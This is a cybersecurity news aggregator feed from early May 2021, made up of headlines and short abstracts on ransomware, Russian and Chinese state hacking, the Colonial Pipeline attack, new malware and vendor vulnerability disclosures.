Abstract WhatsApp on Friday disclosed that it won't deactivate accounts of users who don't accept its new privacy policy rolling out on May 15, adding it will continue to keep reminding them to accept the new terms. "No one will have their accounts deleted or lose functionality of WhatsApp on May 15 because of this update," the Facebook-owned messaging service said in a statement. The move marks a turnaround from its previous stance earlier this year when the company outlined plans to make the accounts inaccessible completely should users choose not to comply with the data-sharing agreement and opt not to have their WhatsApp account information shared with Facebook. "If you haven't accepted by [May 15], WhatsApp will not delete your account. However, you won't have full functionality of WhatsApp until you accept," the company had previously said. "For a short time, you'll be able to receive calls and notifications, but won't be able to

The Hacker News

May 08, 2021 – Breach

Ransomware gangs have leaked the stolen data of 2,100 companies so far Full Text

Abstract Since 2019, ransomware gangs have leaked the stolen data for 2,103 companies on dark web data leaks sites.

BleepingComputer

May 8, 2021 – Outage

A cyberattack shut down US Colonial Pipeline Full Text

Abstract A cyberattack forced the shutdown of one of the largest pipelines in the United States, the Colonial Pipeline facility in Pelham, Alabama. The Colonial Pipeline facility in Pelham, Alabama was hit by a cybersecurity attack, its operators were forced...

Security Affairs

May 8, 2021 – Phishing

Microsoft warns of a large-scale BEC campaign running a gift card scam Full Text

Abstract Microsoft is warning of a large-scale BEC campaign that targeted hundreds of organizations leveraging typo-squatted domains registered days before the attacks. Business email compromise (BEC) attacks represent a serious threat to organizations worldwide,...

Security Affairs

May 08, 2021 – Vulnerabilities

Top 11 Security Flaws Russian Spy Hackers Are Exploiting in the Wild Full Text

Abstract Cyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous public disclosures of their attack methods, according to a new advisory jointly published by intelligence agencies from the U.K. and U.S. Friday. "SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders," the National Cyber Security Centre (NCSC) said. These include the deployment of an open-source tool called Sliver to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities. The development followed the public attribution of SVR-linked actors to the SolarWinds supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.

The Hacker News

May 8, 2021 – Government

US spy agencies review software suppliers’ ties to Russia following SolarWinds hack Full Text

Abstract U.S. intelligence agencies have begun a review of supply chain risks emanating from Russia in light of the far-reaching hacking campaign that exploited software made by SolarWinds and other vendors, a top Justice Department official said.

Cyberscoop

May 8, 2021 – APT

Russian cyber-spies changed tactics after the UK and US outed their techniques – so here’s a list of those changes Full Text

Abstract Russian spies from APT29 responded to Western agencies outing their tactics by adopting a red-teaming tool to blend into targets' networks as a legitimate pentesting exercise.

The Register

May 8, 2021 – Ransomware

CaptureRx Hit with Ransomware Attack Full Text

Abstract An investigation revealed that certain files were accessed without permission, including first and last names, dates of birth, prescription information, and medical record numbers.

Heimdal Security

May 8, 2021 – Breach

19 petabytes of data exposed across 29,000+ unprotected databases Full Text

Abstract CyberNews researchers found more than 29,000 unprotected databases worldwide that are still publicly accessible, leaving close to 19,000 terabytes of data exposed to anyone, including threat actors.

Security Affairs

May 8, 2021 – Vulnerabilities

Popular routers found vulnerable to hacker attacks Full Text

Abstract The main issues affecting routers supplied by ISPs such as Virgin, EE, Sky, TalkTalk, and Vodafone were weak default passwords, local network vulnerabilities, and the lack of firmware updates to patch security loopholes.

ESET Security

May 8, 2021 – Vulnerabilities

VMware Patches Critical Flaw Reported by Sanctioned Russian Security Firm Full Text

Abstract VMware has patched another critical vulnerability reported by Positive Technologies, a Russian cybersecurity firm that was sanctioned recently by the United States of America.

Security Week

May 8, 2021 – Vulnerabilities

Russian hackers are targeting these vulnerabilities, so patch now Full Text

Abstract Russian cyberattacks are being deployed with new techniques - including exploiting vulnerabilities like the recent Microsoft Exchange zero-days - as its hackers continue to target governments, organizations, and energy providers around the world.

ZDNet

May 07, 2021 – Ransomware

The Week in Ransomware - May 7th 2021 - Attacking healthcare Full Text

Abstract While ransomware attacks continued throughout the week, for the most part, it has been quieter than usual, with only a few new variants released.

BleepingComputer

May 07, 2021 – General

Hillicon Valley: US, UK authorities say Russian hackers exploited Microsoft vulnerabilities | Lawmakers push for more cyber funds in annual appropriations | Google child care workers ask for transportation stipend Full Text

Abstract American and British authorities said Friday that Russian state-sponsored hackers exploited major vulnerabilities in Microsoft’s Exchange Server, which were previously used by at least one Chinese state-sponsored hacking group to compromise potentially thousands of organizations. Meanwhile, lawmakers on both sides of the aisle are pushing hard for more cyber funding in the annual appropriations bills, and Google child care workers are pushing for a transportation stipend from the company. 

The Hill

May 07, 2021 – Government

Lawmakers push for increased cybersecurity funds in annual appropriations Full Text

Abstract Lawmakers are increasingly pushing for Congress to increase funding in numerous areas to boost the nation’s cybersecurity, particularly after multiple major breaches and a year in which hackers have increasingly targeted critical infrastructure. 

The Hill

May 7, 2021 – Business

Beware the gold rush: The risk of a cyber investment surge Full Text

Abstract Crises beget demand, which begets a terrific business opportunity.

SCMagazine

May 7, 2021 – APT

Russia-linked APT29 group changes TTPs following April advisories Full Text

Abstract The UK and US cybersecurity agencies have published a report detailing techniques used by the Russia-linked cyberespionage group known as APT29 (aka Cozy Bear). Today, UK NCSC and the CISA-FBI-NSA cybersecurity agencies published a joint security advisory that...

Security Affairs

May 07, 2021 – Attack

Microsoft: Business email compromise attack targeted dozens of orgs Full Text

Abstract Microsoft detected a large-scale business email compromise (BEC) campaign that targeted more than 120 organizations using typo-squatted domains registered days before the attacks began.

BleepingComputer

May 7, 2021 – General

Security researchers applaud Google’s move towards multi-factor authentication Full Text

Abstract Google took an important step on Thursday by saying that "very soon" it will automatically enroll users in what it is calling two-step verification (2SV) – a move security researchers say is a step in the right direction.

SCMagazine

May 07, 2021 – Insider Threat

Bulletproof hosting admins plead guilty to running cybercrime safe haven Full Text

Abstract Four individuals from Eastern Europe are facing 20 years in prison on Racketeer Influenced and Corrupt Organizations (RICO) charges after pleading guilty to running a bulletproof hosting service as a safe haven for cybercrime operations targeting US entities.

BleepingComputer

May 07, 2021 – Hacker

US, UK authorities say Russian state-sponsored hackers exploited Microsoft vulnerabilities Full Text

Abstract Russian state-sponsored hackers were among those to exploit recently uncovered vulnerabilities in Microsoft’s Exchange Server email application, which potentially compromised thousands of organizations, a coalition of American and British federal agencies warned Friday.

The Hill

May 7, 2021 – Malware

Panda Stealer: Spreading via Spam Emails and Discord Full Text

Abstract Panda Stealer, a new cryptocurrency stealer variant, has been found spreading through a global spam campaign and potentially through Discord channels. It is targeting individuals across the U.S., Australia, Japan, and Germany.

Cyware Alerts - Hacker News

May 7, 2021 – Malware

Buer malware rewritten in Rust language to curb detection Full Text

Abstract Researchers said that the last few years saw malware authors adopting newer coding languages at a more rapid pace.

SCMagazine

May 7, 2021 – Phishing

Three Marylanders Indicted Over BEC Scam Full Text

Abstract Defendants charged in connection with dating and BEC scams that netted over $2.3m

Infosecurity Magazine

May 07, 2021 – Vulnerabilities

Foxit Reader bug lets attackers run malicious code via PDFs Full Text

Abstract Foxit Software, the company behind the highly popular Foxit Reader, has published security updates to fix a high severity remote code execution (RCE) vulnerability affecting the PDF reader.

BleepingComputer

May 7, 2021 – Hacker

Hacking the Hackers, OGUsers Hacked Again Full Text

Abstract OGUsers has been hacked for the fourth time in two years. The hacking forum’s database consisting of private messages and user records for almost 350,000 members is on sale now for $3,000.

Cyware Alerts - Hacker News

May 7, 2021 – Breach

US Physics Laboratory Exposed Documents, Credentials Full Text

Abstract Fermilab has tidied up its systems after security researchers found weaknesses exposing documents, proprietary applications, personal information, project details, and credentials.

Gov Info Security

May 7, 2021 – General

Work from Home, Cyberattacks, and Financial Organizations: An Undesirable Trend Full Text

Abstract Insurers and banks witnessed a rise in botnet, phishing, and ransomware attacks by 35%; mobile malware by 32%; COVID-related malware by 30%; and insider threats by 29%, according to a new report.

Cyware Alerts - Hacker News

May 7, 2021 – Vulnerabilities

A Dangerously Bad macOS Bug and a Malware Campaign Full Text

Abstract A dangerously bad zero-day vulnerability in macOS was being abused by the Shlayer malware to bypass Apple’s Gatekeeper, Notarization, and File Quarantine security checks.

Cyware Alerts - Hacker News

May 7, 2021 – Business

Forcepoint Buys Remote Browser Isolation Startup Cyberinc Full Text

Abstract Forcepoint has purchased emerging remote browser isolation vendor Cyberinc to give administrators granular controls that allow them to minimize risk without impeding user productivity.

CRN

May 7, 2021 – Breach

19 petabytes of data exposed across 29,000+ unprotected databases Full Text

Abstract Researchers found that over 29,000 databases worldwide are still completely unprotected and publicly accessible, leaving close to 19,000 terabytes of data exposed to anyone, including threat actors.

Cyber News

May 7, 2021 – Government

DHS to hire 200 more cyber pros as Biden administration grapples with hacking threats Full Text

Abstract In a speech Wednesday, Homeland Security Secretary Alejandro Mayorkas said the cyber recruiting was part of “the most significant hiring initiative” that DHS has undertaken in its 18-year history.

Cyberscoop

May 7, 2021 – Policy and Law

Lawsuit Filed Over Contact Tracing Data Breach Full Text

Abstract State of Pennsylvania and Insight Global accused of cybersecurity failures after PHI exposed

Infosecurity Magazine

May 7, 2021 – Botnet

Bot Attacks a Top Cybersecurity Concern Full Text

Abstract Majority of security leaders view bot mitigation as a top priority

Infosecurity Magazine

May 7, 2021 – Vulnerabilities

Intel, AMD Dispute Findings on Chip Vulnerabilities Full Text

Abstract Intel and AMD insist that users of their chips do not need to take any additional security measures as a result of the discovery because existing protections are adequate.

Gov Info Security

May 7, 2021 – Breach

19 petabytes of data exposed across 29,000+ unprotected databases Full Text

Abstract CyberNews researchers found more than 29,000 unprotected databases worldwide that are still publicly accessible, leaving close to 19,000 terabytes of data exposed to anyone, including threat actors. Most organizations use databases to store sensitive...

Security Affairs

May 7, 2021 – Breach

ShinyHunters leak database of Indian wedding portal WedMeGood Full Text

Abstract It is worth noting that WedMeGood apparently suffered a data breach back in October 2020, when a threat actor published a list of several compromised sites and offered their databases for a price.

Hackread

May 07, 2021 – Privacy

4 Major Privacy and Security Updates From Google You Should Know About Full Text

Abstract Google has announced a number of user-facing and under-the-hood changes in an attempt to boost privacy and security, including rolling out two-factor authentication automatically to all eligible users and bringing iOS-styled privacy labels to Android app listings. "Today we ask people who have enrolled in two-step verification (2SV) to confirm it's really them with a simple tap via a Google prompt on their phone whenever they sign in," the company said. "Soon we'll start automatically enrolling users in 2SV if their accounts are appropriately configured." Google Play To Get Apple-Like Privacy Labels The Google Play Store for Android is also getting a huge overhaul on the privacy front. The search giant said it plans to include a new safety section for app listings that highlights the type of data that is collected and stored — such as approximate or precise location, contacts, personal information, photos and videos, and audio files — and how the data i

The Hacker News

May 07, 2021 – Hacker

Russian state hackers switch targets after US joint advisories Full Text

Abstract Russian Foreign Intelligence Service (SVR) operators have switched their attacks to target new vulnerabilities in reaction to US govt advisories published last month with info on SVR tactics, tools, techniques, and capabilities used in ongoing attacks.

BleepingComputer

May 7, 2021 – Ransomware

US defense contractor BlueForce apparently hit by ransomware Full Text

Abstract The Conti ransomware operators demanded nearly $1 million in bitcoin during ransomware negotiations and threatened to publish the defense contractor's data on its leak site.

Tech Target

May 7, 2021 – General

80% of Net Neutrality Comments to FCC Were Fudged Full Text

Abstract NY’s AG: Millions of fake comments – in favor and against – came from a secret broadband-funded campaign or from a 19-year-old’s fake identities.

Threatpost

May 7, 2021 – Policy and Law

Israel’s Version of Moving Fast and Breaking Things: The New Cybersecurity Bill Full Text

Abstract If a new law is passed by government committee and the Knesset, it will redefine cybersecurity governance in Israel.

Lawfare

May 7, 2021 – General

NCSC Sets Out Security Principles for Smart Cities Full Text

Abstract The guidance is designed to help local authorities in the UK build secure smart cities

Infosecurity Magazine

May 7, 2021 – General

[Full-Disclosure] HideezKey 2 FAIL: How a good idea turns into a SPF (Security Product Failure) Full Text

Abstract HideezKey - This is a deep-dive into a nice concept for a security token & password manager that turned into a horrible product due to lack of proper R&D and Threat Modeling. Prologue: After my first success in bypassing APPROTECT readout...

Security Affairs

May 07, 2021 – Vulnerabilities

6 Unpatched Flaws Disclosed in Remote Mouse App for Android and iOS Full Text

Abstract As many as six zero-days have been uncovered in an application called Remote Mouse, allowing a remote attacker to achieve full code execution without any user interaction. The unpatched flaws, collectively named 'Mouse Trap,' were disclosed on Wednesday by security researcher Axel Persinger, who said, "It's clear that this application is very vulnerable and puts users at risk with bad authentication mechanisms, lack of encryption, and poor default configuration." Remote Mouse is a remote control application for Android and iOS that turns mobile phones and tablets into a wireless mouse, keyboard, and trackpad for computers, with support for voice typing, adjusting computer volume, and switching between applications with the help of a Remote Mouse server installed on the machine. The Android app alone has been installed over 10 million times. In a nutshell, the issues, which were identified by analysing the packets sent from the Android app to its Windows ser

The Hacker News

May 07, 2021 – Privacy

Twitter Tip Jar may expose PayPal address, sparks privacy concerns Full Text

Abstract This week Twitter has begun experimenting with a new feature called 'Tip Jar,' which lets Twitter users tip select profiles to support their work. But the feature has sparked multiple concerns among Twitter users: from the sender's PayPal shipping address getting exposed, to how disputes are handled.

BleepingComputer

May 7, 2021 – Vulnerabilities

VMware addresses critical RCE in vRealize Business for Cloud Full Text

Abstract VMware has fixed a new critical RCE flaw in VMware vRealize Business for Cloud that was reported by sanctioned Russian firm Positive Technologies. VMware has addressed a critical remote code execution vulnerability, tracked as CVE-2021-21984, in VMware...

Security Affairs

May 7, 2021 – Malware

New Moriya Rootkit Used in the Wild to Backdoor Windows Systems Full Text

Abstract Moriya rootkit is used by an unknown actor to deploy passive backdoors on public-facing servers, facilitating the creation of a covert C2 communication channel through which they can be controlled.

Kaspersky Labs

May 07, 2021 – General

Data leak marketplaces aim to take over the extortion economy Full Text

Abstract Cybercriminals are embracing data-theft extortion by creating dark web marketplaces that exist solely to sell stolen data.

BleepingComputer

May 7, 2021 – Vulnerabilities

New Techniques Emerge for Abusing Windows Services to Gain System Control Full Text

Abstract Several new techniques have become available recently that give attackers an easy way to abuse legitimate Windows services and escalate low-level privileges on a system to gain full control of it.

Dark Reading

May 7, 2021 – Government

CISA used new subpoena power to contact US companies vulnerable to hacking Full Text

Abstract CISA used a new subpoena power for the first time last week to contact at least one U.S. internet service provider with customers whose software is vulnerable to hacking.

Cyberscoop

May 7, 2021 – Vulnerabilities

Millions of Older Broadband Routers Plagued by Security Flaws, Warn Researchers Full Text

Abstract Millions of households in the UK are using old broadband routers that could fall prey to hackers, according to a new investigation carried out by consumer watchdog Which?.

ZDNet

May 07, 2021 – Vulnerabilities

New tsuNAME Flaw Could Let Attackers Take Down Authoritative DNS Servers Full Text

Abstract Security researchers Thursday disclosed a new critical vulnerability affecting Domain Name System (DNS) resolvers that could be exploited by adversaries to carry out denial-of-service attacks against authoritative nameservers. The flaw, called 'TsuNAME,' was discovered by researchers from SIDN Labs and InternetNZ, which manage the national top-level internet domains '.nl' and '.nz' for the Netherlands and New Zealand, respectively. "TsuNAME occurs when domain names are misconfigured with cyclic dependent DNS records, and when vulnerable resolvers access these misconfigurations, they begin looping and send DNS queries rapidly to authoritative servers and other resolvers," the researchers said. A recursive DNS resolver is one of the core components involved in DNS resolution, i.e., converting a hostname such as www.google.com into a computer-friendly IP address like 142.250.71.36. To achieve this, it responds to a client's request for a web

The Hacker News

May 7, 2021 – Ransomware

CISA Warns of Attacks Using FiveHands Ransomware and SombRAT Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a recent successful cyberattack against an organization using a new ransomware variant, which CISA refers to as FiveHands.

ICSA

May 7, 2021 – Vulnerabilities

Millions of Households at Risk from Outdated Routers Full Text

Abstract Which? report warns many lack regular firmware updates

Infosecurity Magazine

May 7, 2021 – Ransomware

#COVID19 Researchers Lose a Week’s Work to Ryuk Ransomware Full Text

Abstract Sophos traces attack back to a stolen password

Infosecurity Magazine

May 7, 2021 – Ransomware

Connecting the Bots – Hancitor fuels Cuba Ransomware Operations Full Text

Abstract The Cuba Ransomware gang has partnered with the crooks behind the Hancitor malware in attacks aimed at corporate networks. The Hancitor downloader has been around for quite some time already. It has been known since at least 2016 for dropping...

Security Affairs

May 7, 2021 – Breach

Misconfigured Database Exposes 200K Fake Amazon Reviewers Full Text

Abstract Mass scheme designed to trick e-commerce customers

Infosecurity Magazine

May 7, 2021 – Malware

Researchers use PyInstaller to create stealth malware Full Text

Abstract Instead of obfuscating code and creating an untraceable malware packer from scratch, cybercriminals could take advantage of PyInstaller to create packers that are not caught in scans.

Tech Target

May 07, 2021 – Ransomware

Cuba Ransomware partners with Hancitor for spam-fueled attacks Full Text

Abstract The Cuba Ransomware gang has teamed up with the spam operators of the Hancitor malware to gain easier access to compromised corporate networks.

BleepingComputer

May 07, 2021 – Malware

New Stealthy Rootkit Infiltrated Networks of High-Profile Organizations Full Text

Abstract An unknown threat actor with the capabilities to evolve and tailor its toolset to target environments infiltrated high-profile organizations in Asia and Africa with an evasive Windows rootkit since at least 2018. Called 'Moriya,' the malware is a "passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them," said Kaspersky researchers Mark Lechtik and Giampaolo Dedola in a Thursday deep-dive. The Russian cybersecurity firm termed the ongoing espionage campaign 'TunnelSnake.' Based on telemetry analysis, less than 10 victims around the world have been targeted to date, with the most prominent victims being two large diplomatic entities in Southeast Asia and Africa. All the other victims were located in South Asia. The first reports of Moriya emerged last November when Kaspersky said it discovered the stealthy implant in the networks

The Hacker News

May 7, 2021 – Ransomware

DHS Secretary: Small Businesses Hard-Hit by Ransomware Full Text

Abstract "The losses from ransomware are staggering. And the pace at which those losses are being realized is equally staggering," Mayorkas said, noting this is why DHS has made battling ransomware a priority.

Bank Info Security

May 7, 2021 – Phishing

Amazon Fake Reviews Scam Exposed in Data Breach Full Text

Abstract In total, 13,124,962 records (or 7GB of data) have been exposed in the breach, potentially implicating more than 200,000 people in unethical activities like giving fake product reviews on Amazon.

Safety Detectives

May 7, 2021 – Attack

Possible attacks on the TCP/IP protocol stack and countermeasures Full Text

Abstract Let’s look at what types of threats each layer of the TCP/IP protocol stack may be susceptible to. The task of a computer security system is to safeguard the information transmitted over the network and to adequately preserve the data stored in it. Excluding...

Security Affairs

May 7, 2021 – General

60% of U.S. School Mobile Apps Disclose Collected Data Without Permission Full Text

Abstract According to the results of the study conducted by Me2B Alliance, 60% of school apps are sending student data to various third parties, including ad networks like Google and Facebook.

Softpedia

May 06, 2021 – Solution

Google wants to enable multi-factor authentication by default Full Text

Abstract Google strives to push all its users to start using two-factor authentication (2FA), which can block attackers from taking control of their accounts using compromised credentials or guessing their passwords.

BleepingComputer

May 6, 2021 – Malware

Pingback Malware Using ICMP for Covert Communication Full Text

Abstract A new Windows malware called Pingback has been found using a DLL hijacking attack to target Microsoft Windows 64-bit systems. The malware takes advantage of ICMP for its command-and-control activities.

Cyware Alerts - Hacker News

May 06, 2021 – General

Hillicon Valley: Broadband companies funded fake net neutrality comments, investigation finds | Twitter rolls out tip feature | Google to adopt ‘hybrid work week’ Full Text

Abstract New York Attorney General Letitia James (D) on Thursday released findings that American broadband companies had funded a campaign to file millions of fake comments with federal authorities around net neutrality. Meanwhile, Twitter announced a new feature to allow users to send and receive tips, while Google detailed its proposal for how employees will work in a post-COVID-19 world. 

The Hill

May 6, 2021 – Policy and Law

“Unusually Unhinged” Cyber-stalker Jailed for 10 Years Full Text

Abstract Man stalked ex-wife and kids from New Mexico to Oregon despite protective order

Infosecurity Magazine

May 6, 2021 – Attack

Windows Moriya rootkit used in highly targeted attacks Full Text

Abstract Experts spotted a new malware, dubbed Moriya rootkit, that targets Windows systems as part of a cyberespionage campaign dubbed TunnelSnake. An unclassified threat actor employed a new stealthy malware, dubbed Moriya rootkit, to compromise Windows systems....

Security Affairs

May 6, 2021 – Phishing

Financial sector saw a 125% increase in mobile phishing attacks during 2020 Full Text

Abstract Average quarterly exposure to phishing attacks on mobile devices in the financial sector rose by 125% – and malware and app risk exposure increased by more than five times.

SCMagazine

May 6, 2021 – Vulnerabilities

Qualcomm Chip Bug Opens Android Fans to Eavesdropping Full Text

Abstract A malicious app can exploit the issue, which could affect up to 30 percent of Android phones.

Threatpost

May 06, 2021 – Vulnerabilities

New TsuNAME DNS bug allows attackers to DDoS authoritative DNS servers Full Text

Abstract Attackers can use a newly disclosed domain name server (DNS) vulnerability publicly known as TsuNAME as an amplification vector in large-scale reflection-based distributed denial of service (DDoS) attacks targeting authoritative DNS servers.

BleepingComputer

May 6, 2021 – Malware

Buer Downloader: Now Using Rust to Hide Itself Full Text

Abstract A new malicious campaign, masquerading as shipping notices from DHL, was found deploying the latest Buer malware loader variant written in Rust. The new update in Buer helps attackers evade detection and increase successful click rates.

Cyware Alerts - Hacker News

May 06, 2021 – Breach

Peloton user data exposed by newly patched vulnerabilities Full Text

Abstract Recently patched vulnerabilities in Peloton’s bike software may have allowed unauthorized users to view sensitive user data, new security research published this week found.

The Hill

May 6, 2021 – Breach

CaptureRx Data Breach Impacts Healthcare Providers Full Text

Abstract US healthcare providers affected by cyber-attack on third-party administrative services vendor

Infosecurity Magazine

May 6, 2021 – Vulnerabilities

Qualcomm bug impacts about 30% of all smartphones Full Text

Abstract A high severity flaw, tracked as CVE-2020-11292, affects Qualcomm Mobile Station Modem chips used by around 30% of all smartphones worldwide. Researchers from Check Point have discovered a buffer overflow vulnerability, tracked as CVE-2020-11292, in the Qualcomm...

Security Affairs

May 6, 2021 – General

Here’s the breakdown of cybersecurity stats only law firms usually see Full Text

Abstract BakerHostetler, a law firm with a massive data and privacy presence, compiles data from its clients’ experiences to offer a rare lawyer’s perspective on cyber statistics. SC spoke to Craig Hoffman, partner at BakerHostetler and the main editor of the report, about the real outcomes from breaches.

SCMagazine

May 06, 2021 – Ransomware

A student pirating software led to a full-blown Ryuk ransomware attack Full Text

Abstract A student's attempt to pirate an expensive data visualization software led to a full-blown Ryuk ransomware attack at a European biomolecular research institute.

BleepingComputer

May 6, 2021 – Vulnerabilities

Flaw in PHP Composer Could Allow Supply-Chain Attacks Full Text

Abstract Security threats in PHP or its components can have a big impact. Lately, a vulnerability was found in the PHP Composer that could have allowed an attacker to execute arbitrary commands and backdoor every PHP package.

Cyware Alerts - Hacker News

May 6, 2021 – Government

DOD Expands Hacker Program Full Text

Abstract Ethical hackers can now hunt bugs in all US publicly accessible defense information systems

Infosecurity Magazine

May 6, 2021 – General

The business of cyber: How security defines (or derails) success Full Text

Abstract Is cyber a hurdle to success, or might it be an enabler? In this SC Awards Winners Circle roundtable, cybersecurity leaders and award recipients share how organizations can shift the mindset and understand how a culture of security just may be good for business.

SCMagazine

May 6, 2021 – APT

Chinese APT Groups Targeting Russian Defense Contractors Full Text

Abstract Hackers infiltrated the systems of Rubin Central Design Bureau for Marine Engineering, a Russian submarine design firm, using a new malware called PortDoor. It is suspected that Chinese actors could be behind the attack.

Cyware Alerts - Hacker News

May 6, 2021 – Vulnerabilities

Vulnerability in Qualcomm chips lets an attacker snoop on calls and texts Full Text

Abstract Check Point researchers shed further light this week on a vulnerability affecting a cellular chip embedded in 40% of the world’s smartphones.

SCMagazine

May 6, 2021 – Hacker

REvil REvil - The Cyber Devil Full Text

Abstract REvil is a fierce threat with its smart hacking tactics and techniques. The ransomware now spreads via exploit kits, RDP servers, backdoored software installers, and scan-and-exploit methods. Apply adequate security measures to stay protected.

Cyware Alerts - Hacker News

May 6, 2021 – Business

SolarWinds hires CISO from within, enabling a quicker security transformation Full Text

Abstract Tim Brown’s familiarity with the internal environment and attack investigation potentially means less time to ramp up company’s Secure by Design initiative. But there could be some drawbacks to hiring from within as well.

SCMagazine

May 6, 2021 – Malware

Roaming Mantis Amplifies Smishing Campaign with OS-Specific Android Malware | McAfee Blogs Full Text

Abstract Since January 2021, Roaming Mantis has been targeting Japanese users with a new malware called SmsSpy. The malicious code infects Android users using one of two variants based on the version of OS.

McAfee

May 6, 2021 – Botnet

A taste of the latest release of QakBot Full Text

Abstract The infection chain starts with a URL in the email body that downloads a zip archive containing an Excel file that uses XLM 4.0 macros to download the 2nd stage from the compromised web servers.

Security Affairs

May 6, 2021 – Business

MDR Firm Huntress Raises $40 Million in Series B Funding Round Full Text

Abstract The Series B round, led by JMI Equity, will help the company expand its platform. Previous investors ForgePoint Capital and Gula Tech Adventures also participated in the latest financing round.

Security Week

May 6, 2021 – Government

Chinese military unit accused of cyber-espionage bought multiple western antivirus products Full Text

Abstract According to multiple documents found by Recorded Future’s Insikt Group, Unit 61419 of the Chinese People’s Liberation Army (PLA) bought small batches of different antivirus products in early 2019.

The Record

May 06, 2021 – Malware

New Moriya rootkit used in the wild to backdoor Windows systems Full Text

Abstract A new stealthy rootkit was used by an unknown threat actor to backdoor targeted Windows systems in a likely ongoing espionage campaign dubbed TunnelSnake and going back to at least 2018.

BleepingComputer

May 6, 2021 – Ransomware

Update: REvil ransomware to blame for UnitingCare Queensland’s April attack Full Text

Abstract The organization, which provides aged care, disability supports, health care, and crisis response services throughout the Australian state, suffered the attack on Sunday, 25 April 2021.

ZDNet

May 06, 2021 – General

CISO Challenge: Check Your Cybersecurity Skills On This New Competition Site Full Text

Abstract InfoSec leaders tend to be a specific type. Their jobs require them to think of possible threats, take actions that may not pay immediate results, plan for unknown security risks, and react quickly when emergencies arise, often before the morning's first coffee. The high-stakes position also means that CISOs need to keep their knowledge and skills sharp – you can never really know what's around the corner. So, what can security leaders do to make sure they're prepared and hone their skills ahead of the next inevitable threat? Now, they can test themselves and their knowledge at a new website, 'The CISO Challenge' ( visit it here ). The website, launched by XDR provider Cynet, aims to let information security leaders test their cybersecurity mettle. The website features a challenge for InfoSec leaders (and those who are looking to become one) to test their knowledge in an exciting, high-stakes, realistic series of scenarios. The challenge consists of 25 scenario

The Hacker News

May 6, 2021 – Phishing

Financial Services Experience 125% Rise in Exposure to Mobile Phishing Full Text

Abstract Cyber-criminals have ramped up their targeting of phones, tablets, and Chromebooks.

Infosecurity Magazine

May 6, 2021 – APT

Chinese PLA Unit 61419 suspected to have purchased AVs for cyber-espionage Full Text

Abstract Chinese military unit PLA Unit 61419 is suspected to be involved in cyber-espionage campaigns against multiple antivirus companies. Researchers from cybersecurity firm Recorded Future’s Insikt Group have discovered six procurement documents from...

Security Affairs

May 06, 2021 – Vulnerabilities

Qualcomm vulnerability impacts nearly 40% of all mobile phones Full Text

Abstract A high severity security vulnerability found in Qualcomm's Mobile Station Modem (MSM) chips (including the latest 5G-capable versions) could enable attackers to access mobile phone users' text messages, call history, and listen in on their conversations.

BleepingComputer

May 6, 2021 – Breach

Faxton St. Luke’s Healthcare vendor faces data breach; potentially exposing information on thousands of patients Full Text

Abstract Faxton St. Luke’s Healthcare (FSLH) was notified on March 30, 2021, that Capture RX, a third-party business associate, experienced a data breach on February 6, 2021, affecting 17,655 patients of FSLH.

WKTV

May 06, 2021 – Vulnerabilities

Critical Flaws Hit Cisco SD-WAN vManage and HyperFlex Software Full Text

Abstract Networking equipment major Cisco has rolled out software updates to address multiple critical vulnerabilities impacting HyperFlex HX and SD-WAN vManage Software that could allow an attacker to perform command injection attacks, execute arbitrary code, and gain access to sensitive information. In a series of advisories published on May 5, the company said there are no workarounds that remediate the issues. The HyperFlex HX command injection vulnerabilities, tracked as CVE-2021-1497 and CVE-2021-1498 (CVSS scores 9.8), affect all Cisco devices running HyperFlex HX software versions 4.0, 4.5, and those prior to 4.0. Arising due to insufficient validation of user-supplied input in the web-based management interface of Cisco HyperFlex HX Data Platform, the flaws could enable an unauthenticated, remote attacker to perform a command injection attack against a vulnerable device. "An attacker could exploit this vulnerability by sending a crafted request to the web-based management int

The Hacker News

May 6, 2021 – General

Financial Firms Report Puzzling 30% Drop in Breaches as Incidents Rise Full Text

Abstract Sector takes more robust approach to GDPR reporting

Infosecurity Magazine

May 6, 2021 – Botnet

A taste of the latest release of QakBot Full Text

Abstract A taste of the latest release of QakBot – one of the most popular and widely reported banking trojans active since 2007. The malware QakBot, also known as Qbot, Pinkslipbot, and Quakbot, is a banking trojan that has made headlines since 2007. This...

Security Affairs

May 6, 2021 – General

Google Chrome adopts Windows 10 security feature Full Text

Abstract To protect the memory stack from cyberattackers, Google revealed that its Chrome 90 has adopted a new Windows 10 security feature called "Hardware-enforced Stack Protection".

The Times Of India

May 06, 2021 – Vulnerabilities

New Qualcomm Chip Bug Could Let Hackers Spy On Android Devices Full Text

Abstract Cybersecurity researchers have disclosed a new security vulnerability in Qualcomm's mobile station modems (MSM) that could potentially allow an attacker to leverage the underlying Android operating system to slip malicious code into mobile phones, undetected. "If exploited, the vulnerability would have allowed an attacker to use Android OS itself as an entry point to inject malicious and invisible code into phones, granting them access to SMS messages and audio of phone conversations," researchers from Israeli security firm Check Point said in an analysis published today. The heap overflow vulnerability, tracked as CVE-2020-11292, resides in the QMI voice service API exposed by the modem to the high level operating system, and could be exploited by a malicious app to conceal its activities "underneath" the OS in the modem chip itself, thus making it invisible to the security protections built into the device. Designed since the 1990s, Qualcomm MSM chip

The Hacker News

May 6, 2021 – Vulnerabilities

Researcher Claims Peloton APIs Exposed All Users Data Full Text

Abstract Even those in privacy mode were affected, says Pen Test Partners

Infosecurity Magazine

May 6, 2021 – Vulnerabilities

Cisco fixes critical flaws in SD-WAN vManage and HyperFlex HX software Full Text

Abstract Cisco fixed critical flaws in SD-WAN vManage and HyperFlex HX software that could allow attackers to create admin accounts and execute commands as root. Cisco has addressed critical vulnerabilities affecting SD-WAN vManage and HyperFlex HX software that could...

Security Affairs

May 6, 2021 – Vulnerabilities

JET engine flaws can crash Microsoft’s IIS, SQL Server, say Palo Alto researchers Full Text

Abstract Researchers at Palo Alto Networks have detailed vulnerabilities in the JET database engine that can be exploited to execute malicious code on systems running Microsoft’s SQL Server and IIS web server.

The Register

May 06, 2021 – Vulnerabilities

New Spectre Flaws in Intel and AMD CPUs Affect Billions of Computers Full Text

